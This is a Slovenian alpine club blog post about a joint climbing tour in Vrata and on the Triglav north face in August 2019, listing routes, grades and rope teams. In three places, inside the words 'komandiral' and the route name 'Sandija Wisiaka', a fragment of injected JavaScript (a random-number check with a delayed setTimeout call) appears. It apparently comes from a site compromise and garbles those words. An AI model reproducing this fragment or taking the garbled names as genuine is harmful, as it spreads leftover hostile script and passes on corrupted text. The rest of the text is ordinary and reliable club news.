Za vikend je blo luštn v Vratih, ajga!

Written by Pavlica

August 4, 2019

Načelnik Egon je skomandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiral skupno turo z namenom plezanja v Severni Triglavski Steni.

Skupna tura je potekala 3. in 4. avgusta z izhodiščem v Aljaževem domu v Vratih. Nekateri se tam zberejo že v petek zvečer, drugi pridejo v soboto zjutraj. Naveze so bile že sestavljene, premetali smo samo opremo in krenili v Steno. Dve navezi v Slovensko, dve v Kratko Nemško. Outsider pa sem s Krištofom iz Radovljice odšel proti JZ steni Stenarja.

V petek je precej deževalo in tudi obeti za soboto popoldan niso bili najboljši, zato smo morali kar migati, da nas ne bi močilo. Mokra skala in slabi obeti so postavili tudi kakšno prepreko pri izbiri željene smeri.

V vsakem primeru je okrog 8 že vsaka naveza v svoji smeri. S Krištofom sva po ogledu mokre Stenarjeve stene premaknila cilje in sicer v zahodno Triglavsko steno, v smer Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andija Wisiaka.

Dobro smo se naplezali in lepo izkoristili dan. V poznejših popoldanskih urah smo se počasi začeli zbirati nazaj v Aljaževem domu. Za nekatere je bila to prva resna, daljša tura. Vsi pripravniki pa s(m)o se izkazali za suverene plezalce s preudarnim gibanjem v skalnem svetu. Še par smeri in bodo že vsi lepo uplezani in pripravljeni zagristi v kaj težjega.

Dan se je za nekatere končal precej pozno. Diskusija se je iz Aljaža premaknila na parkirišče pri Egonovem kombiju, kjer smo nadaljevali z umivanjem zob z različnimi zobnimi pastami. Prozorne, rjavkaste, lahke mehurčkaste… Nekaj udeležencev tabora je v soboto zvečer odšlo domov, nakaj nas ostane v Vratih, kjer prespimo v domu oziroma v Egonovem kombiju.

V nedeljo se je plezanje nadaljevalo. Okrog 5 zjutraj že trkajo na vrata kombija. Jaz sem spal kraljevsko, Boštjana pa je baje sredi noči zbudil gozdar, ki je nažigal svojo motorko 

Dominik nas vrže pokonci, ko skupaj z Darjom in Katjo že stopajo proti Nemški. Ostali smo bolj počasne sorte in potrebujemo še kakšno urico, da se pripravimo.

Egon in Peter se odpravita v Bavarsko, ampak zaradi vlakca navez pred njima tudi onadva zarineta v Kratko Nemško. Midva z Boštjanom pa po vseh jutranjih ritualih stopava proti Stopnicam v nebo. Lepa, intenzivna smer, ki ne popušča preveč. Na trenutke bi si kar želel kakšen klin v smeri več, sploh v spodnjem delu. Zaradi Boštjanovega slabega počutja večino smeri plezam kot prvi.

Tokrat sem bil pa jaz tisti, ki so ga morali čakati, čeprav spet ne tako zelo. Na parkirišču se dobimo z ostalimi navezami, katerim se vidi, da so že bolj uigrane. Po dveh zaključnih besedah in lahkih prigrizkih se odpravimo nazaj proti Ajdovščini.

Skupna tura AO Ajdovščina je bila uspešno zaključena! V Vrata smo se vsi vrnili, če citiram Jožo Čopa: čili in zdravi kot gorski kozel.

Zahvala gre Egonu za odlično izpeljano skupno turo ter Boštjanu, ki je asistiral pri obveščanju.

Čestitke vsakemu udeležencu, ki je suvereno premagal 800m zahtevnega terena in plezanja, ter dokazal, da je pripravljen na kompleksnejše ture in plezanje v vodstvu.

Čestitke tudi mojemu soplezalcu Krištofu Frelihu, ki je imel naslednji dan izpitno turo za alpinista in jo seveda suvereno izpeljal!

Skupno se je ture udeležilo kar 13 udeležencev iz AO Ajdovščina in 1 pridruženi član iz AO Radovljica. Plezali smo 4 različne smeri in skupaj opravili kar 19 vzponov!

Spisal Matic z Lozic

Urban: Eine nicht so kleine Duetsche…

Darjo: Super tura,dobri soplezalci,hvala Dominiku ,ki nas je vodil in bil prvi v navezi.

Sobota, 3.8. 2019

Kratka Nemška smer, izstop Zimmer – Jahn, IV-/III, 800m

Naveza: Egon Pavlica, Tilen Marc Naveza: Urban Gregorc, Helena Vrečko

Slovenska smer, II-III, 800m

Naveza: Boštjan Mikuž, Anamarija Božič, Špela Škvarč

Naveza: Peter Vičič, Marko Butinar, Katja Vrabec

Smer Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andija Wisiaka, V, 600m, 5h

Naveza: Matic Štrancar, Krištof Frelih (AO Radovljica)

Nedelja, 4.8.2019

Kratka Nemška smer, izstop Zimmer – Jahn, IV-/III, 800m

Naveza: Dominik Mikuž, Katja Vrabec, Darjo Černe

Naveza: Egon Pavlica, Peter Vičič

Stopnice v nebo, VII-/V-VI, 500m, 10h

Naveza: Boštjan Mikuž, Matic Štrancar

 

Categories

Archives

You May Also Like…

Hvar Climb and Sail

Hvar Climb and Sail

Premierni climb and sail alpinističnega odseka Ajdovščina je uspešno za nami! Težko je zbrati vsa čustva v samostojni...

Spomladanski večraztežajci

Spomladanski večraztežajci

Letošnjo spomladansko sezono plezanja športnih večraztežajnih smeri smo otvorili v sredini marca z vikend izletom v...

Zima 2023

Zima 2023

Če sem lansko zimo »zapravil« s samo dvema 600 m grapama sem letošnjo zimo izkoristil do kraja.. no še več bi splezal,...

1 Comment

  1. pavlica

    Sem dodal še slike Matica in Boštjana, ko sta plezala stopnice v nebo.

Submit a Comment